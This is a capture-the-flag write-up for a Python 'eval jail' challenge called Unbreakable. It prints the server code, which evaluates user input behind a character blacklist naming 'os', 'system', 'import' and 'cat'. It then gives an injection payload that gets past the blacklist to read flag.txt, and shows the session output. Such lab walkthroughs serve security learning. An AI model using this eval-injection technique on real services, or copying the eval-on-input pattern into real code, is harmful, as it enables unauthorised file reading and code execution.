# Unbreakable \[MISC]

### Description : 

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

### Misc - 300 points

## <mark style="color:orange;">**Walkthrough**</mark>

We start by downloading the source files.

{% file src="<https://2332894340-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEdOMDo0CmDiko2Wp2e9E%2Fuploads%2FR27CfJUjIO4y5iO8mLdR%2Fmisc_unbreakable.zip?alt=media&token=aa48205c-f0aa-4d80-8dba-119e2eb9ac9e>" %}

We are given a&#x20;

`main.py` file that probably runs on the server. We can connect to the server using `nc 94.237.56.118 35970`.

Looking at the `main.py` file, we see that we can provide input which will be executed via eval. Unfortuantely there is a blacklist that prevents us from using certain characters.

```python
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 
```

Additionally a `()` is appended to the input, so we probably have to end our input with something that is callable.

Looking at the blacklist we figure out that we can use `print` to output things, `open` to open a file and `read` to read the contents of the file.

We can also use single quotes so this payload would be valid to read the flag:&#x20;

`open('flag.txt').read`.

This would open the flag file and read its contents. Unfortunately this doesn't print the contents of the file, so we have to use print.

`print(open('flag.txt').read())` doesn't work, because the appendend `()` would make it `print(open('flag.txt').read())()` which results in an error.

Fortunately `eval` supports multiple statements separated by a comma, so we can use `print(open('flag.txt').read()),print` to print the flag.

This is valid because the appended `()` would make it `print(open('flag.txt').read()),print()` which is a valid statement.

### Connecting to the server and providing this input gives us the flag:

<pre class="language-sh"><code class="lang-sh"><strong>┌── 👽AKUMA 🥷 ➤➤ 🌐10.10.0.12
</strong>├──[   ~/Desktop/CTF/hackerroyale]
└─ ⚔ nc 94.237.56.118 35970
Break me, shake me!

$ print(open('flag.txt').read()),print
HTB{3v4l_0r_3vuln??}


WHAT WAS THAT?!

Break me, shake me!

$
</code></pre>